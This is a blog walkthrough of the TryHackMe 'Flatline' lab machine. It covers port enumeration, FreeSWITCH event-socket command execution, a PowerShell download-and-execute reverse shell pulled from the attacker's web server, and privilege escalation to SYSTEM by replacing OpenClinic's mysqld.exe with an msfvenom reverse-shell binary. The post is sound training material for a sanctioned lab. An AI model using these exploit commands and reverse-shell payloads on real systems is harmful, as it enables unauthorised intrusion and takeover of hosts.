DEV Community

Krishna
Krishna

Posted on

TryHackMe Flatline Walkthrough

TryHackMe page for this machine => https://tryhackme.com/room/flatline

NOTE: I had to terminate and start the machine multiple times, as the exploit needed for foothold timed out multiple times. You may have to do the same.

Enum

rustscan nmap

rustscan -a 10.10.98.113 -- -A -Pn

Open 10.10.98.113:3389
Open 10.10.98.113:8021

PORT     STATE SERVICE          REASON  VERSION
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:40:13+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-05T09:12:21
| Not valid after:  2023-05-07T09:12:21
| MD5:   3090 28ea a18f 37ce f134 275b 8a11 85b7
| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQd/ojPAXxV75Ihn2h8kAwfTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjIxMTA1MDkxMjIxWhcNMjMw
| NTA3MDkxMjIxWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQClNnOLEC5U40F8dFZZtmmSj8zVa4Fqd0fU
| 3O+Pf/sDLF/23s4R6LkjvmjZaGNWMAVzlKwOMYJ3umlmLTRJJF0DEnaM79phGLba
| ePPbdRiUjUQFdBK9tyPpYCLB2m+K1z0YJLoXt8br7WSVp7Ho8Sz2E6sBZRM5H6QN
| ptO8j/syFSdLYWusTAp/gEQpVUoiElFcmDfa7rP2gQELHb03EvL9Gz9lPRrrVA3r
| XzEUNuqkG4J70LenFv7AH1j70FL48UStBESKYLaXaruRN8TkVjRWhmrYhC7tMVRB
| h8oVb8bcCvwqsw7VYEy197AdyePV0fkvjfbyrp6tstPMVm4hFM2FAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAfv/F86NeGYpqgaQz5Q+R5FrYkqnZoZBxrlbpG8rB9+hixOjRs6s6skjy
| x0IYovOcSXI3Sy4dh3GRjWn+hv5szbYzb4hKQojzw7CNScJSbTyGh7sJuGv1+hUe
| F6izAORicQkApcLweXv5MyVj1qUrmwWo4DpbG34nIf6W6hpNlW2VdWfCqIfjnEvy
| 3LOWrn++sncxXdBmg24fDNohJJFgvp3ui7VbmYVepe1SmqIql7vKt+qMV2kZv+cg
| SU1pZqYrHwwcpD3Qx6R7oqSVHjulW1eGTC6t+au8Oc6rytgamvbrCIGAwSUVcJLt
| pVkvw++/yMtWLoiiT+RCa2abEwEcPw==
|_-----END CERTIFICATE-----
|_ssl-date: 2022-11-06T09:40:13+00:00; 0s from scanner time.
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Enter fullscreen mode Exit fullscreen mode

Note: The machine keeps blocking ping probes. So use the nmap-Pn flag when enumerating the machine!.

Port 3389 Enumeration

Let's use some nmap scripts to enumerate the port some more.

└─$ sudo nmap --script="rdp-*" -p 3389 flatline.thm -vv -Pn

PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:55:55+00:00
| rdp-enum-encryption: 
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS

Enter fullscreen mode Exit fullscreen mode

Port 8021 Enumeration

I wanted to see what in the world FreeSWITCH is. From Wikipedia https://en.wikipedia.org/wiki/FreeSWITCH

**FreeSWITCH* is free and open-source server software for real-time communication applications, including WebRTC, video, and voice over Internet Protocol (VoIP). It runs on Linux, Windows, macOS, and FreeBSD. FreeSWITCH is used to build private branch exchange (PBX) telecommunication systems, IVR services, videoconferencing with chat and screen sharing, wholesale least-cost routing, Session Border Controller (SBC) and embedded communication appliances.*

Let's look for some vulnerabilities.

└─$ searchsploit freeswitch                                
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                                                                   | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                                                                      | windows/remote/47799.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Enter fullscreen mode Exit fullscreen mode

Interesting. Let's try and get RCE without Metasploit.

Foothold

RCE without Metasploit

Using the script present here => https://www.exploit-db.com/exploits/47799

└─$ python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

Enter fullscreen mode Exit fullscreen mode

Looks like it works! Let's try and get a proper shell going on here.

└─$ python3 exploit.py 10.10.7.242 dir   
Authenticated
Content-Type: api/response
Content-Length: 2346

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Program Files\FreeSWITCH

09/11/2021  07:38    <DIR>          .
09/11/2021  07:38    <DIR>          ..
09/11/2021  07:22    <DIR>          cert
09/11/2021  07:22    <DIR>          conf
06/11/2022  10:33    <DIR>          db
09/11/2021  07:18    <DIR>          fonts
20/08/2019  12:08         4,991,488 FreeSwitch.dll
20/08/2019  12:08            26,624 FreeSwitchConsole.exe
20/08/2019  12:19            62,976 fs_cli.exe
09/11/2021  07:18    <DIR>          grammar
---
SNIP
---
24/03/2018  20:20        15,766,528 v8.dll
24/03/2018  20:05           177,152 v8_libbase.dll
24/03/2018  20:19           134,656 v8_libplatform.dll
03/04/2018  14:01           126,976 zlib.dll
              28 File(s)     96,800,060 bytes
              17 Dir(s)  50,476,666,880 bytes free

Enter fullscreen mode Exit fullscreen mode

Let's try and get the user flag.

└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\"
Authenticated
Content-Type: api/response
Content-Length: 405

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users

09/11/2021  07:28    <DIR>          .
09/11/2021  07:28    <DIR>          ..
09/11/2021  07:13    <DIR>          Administrator
09/11/2021  07:37    <DIR>          Nekrotic
09/11/2021  07:13    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  50,457,559,040 bytes free

└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\Nekrotic\\Desktop\\"
Authenticated
Content-Type: api/response
Content-Length: 374

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,446,991,360 bytes free


Enter fullscreen mode Exit fullscreen mode

Wow. We seem to have found both files. We can read user.txt.

But we can't read root.txt. Probably a permissions issue.

Let's get a powershell reverse shell to see what's really going on.

Powershell Reverse Shell

  1. Save this file https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
  2. Delete the second shell comment. As for the first one, uncomment and replace IP and PORT as per your choice.
  3. Start a Python web server in the folder where you saved the powershell script. This is what we will use to serve the script.
  4. Download and execute the script on remote machine using the FreeSWITCH exploit.

Running the exploit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_flatline]
└─$ python3 exploit.py 10.10.7.242 "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"
Enter fullscreen mode Exit fullscreen mode

Run the web server to serve the Powershell reverse shell

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.7.242 - - [06/Nov/2022 06:20:12] "GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1" 200 -
Enter fullscreen mode Exit fullscreen mode

Reverse Shell listener

┌──(kalikali)-[~]
└─$ ncat -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.7.242.
Ncat: Connection from 10.10.7.242:49899.

PS C:\Program Files\FreeSWITCH> gci


    Directory: C:\Program Files\FreeSWITCH


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:22                cert                                                                  
d-----       09/11/2021     07:22                conf                                                                  
d-----       06/11/2022     10:33                db                                                                    
d-----       09/11/2021     07:18                fonts                                                                 
d-----       09/11/2021     07:18                grammar    
....
SNIP
....

PS C:\Users\Nekrotic\Desktop> get-acl -path user.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner                    Access                                                                               
----     -----                    ------                                                                               
user.txt WIN-EOM4PK0578N\Nekrotic NT AUTHORITY\SYSTEM Allow  FullControl...  

PS C:\Users\Nekrotic\Desktop> get-acl -Path root.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner               Access                                
----     -----               ------                                
root.txt NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM Allow  FullControl
Enter fullscreen mode Exit fullscreen mode

Now we can see why we can't read root.txt. We will need to escalate privileges to be able to read the file.

Privesc

While taking a look around the system, I came across this in the Administrator's desktop


PS C:\Users\Administrator\Desktop> gci

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       08/11/2021     18:24      108048384 FreeSWITCH-1.10.1-Release-x64.msi                                     
-a----       08/11/2021     06:05      413584335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe 

Enter fullscreen mode Exit fullscreen mode

I am guessing this OpenClinic software is installed. Looking around the system further, we find its installation location at C:\projects\openclinic.


PS C:\projects\openclinic> gci

    Directory: C:\projects\openclinic

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                jdk1.8                                                                
d-----       09/11/2021     07:19                mariadb                                                               
d-----       09/11/2021     07:30                tomcat8                                                               
d-----       09/11/2021     07:29                Uninstall                                                             
-a----       06/04/2021     23:14            250 configureCountry.bat                                                  
-a----       01/07/2021     18:20            167 configureLanguage.bat                                                 
-a----       09/11/2021     07:18         334840 lua5.1.dll                                                            
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe                                               
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe                                           
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat                                                
-a----       09/11/2021     07:18        1389568 uninstall.exe   

Enter fullscreen mode Exit fullscreen mode

Let's see what we can do with this.

┌──(kali㉿kali)-[~/Documents/ctf_tools]
└─$ searchsploit openclinic
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation                                                                        | windows/local/50448.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Enter fullscreen mode Exit fullscreen mode

Details of this exploit here => https://www.exploit-db.com/exploits/50448

According to the instructions we need to replace the mysqld.exe present in the OpenClinic installation with a malicious payload generated by us.

Let's see if we have the permissions to do that.


PS C:\projects\openclinic\mariadb\bin> get-acl -Path .

    Directory: C:\projects\openclinic\mariadb

Path Owner                  Access                                                                                     
---- -----                  ------                                                                                     
bin  BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow  FullControl...

PS C:\projects\openclinic\mariadb\bin> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\BATCH                                            Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group             
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                                     

Enter fullscreen mode Exit fullscreen mode

Looks like we can.

Let's begin.

Generate Payload

On our machine.

└─$ msfpc powershell 10.14.31.78 443 cmd reverse stageless exe
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
 [i]   IP: 10.14.31.78
 [i] PORT: 443
 [i] TYPE: windows (windows/shell_reverse_tcp)
 [i]  CMD: msfvenom -p windows/shell_reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=10.14.31.78 LPORT=443 \
  > '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] windows shell created: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] MSF handler file: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

└─$ mv windows-shell-stageless-reverse-tcp-443.exe mysqld.exe
Enter fullscreen mode Exit fullscreen mode

On the server.

We will have to restart the computer as per the exploit instructions.

PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak

PS C:\projects\openclinic\mariadb\bin> IWR -Uri http://10.14.31.78/mysqld.exe -OutFile mysqld.exe                    

PS C:\projects\openclinic> Restart-Computer 

Enter fullscreen mode Exit fullscreen mode

Now we wait for our reverse shell to activate.


└─$ ncat -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.52.62.
Ncat: Connection from 10.10.52.62:49669.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Enter fullscreen mode Exit fullscreen mode

DONE! Go get that root flag!

Top comments (0)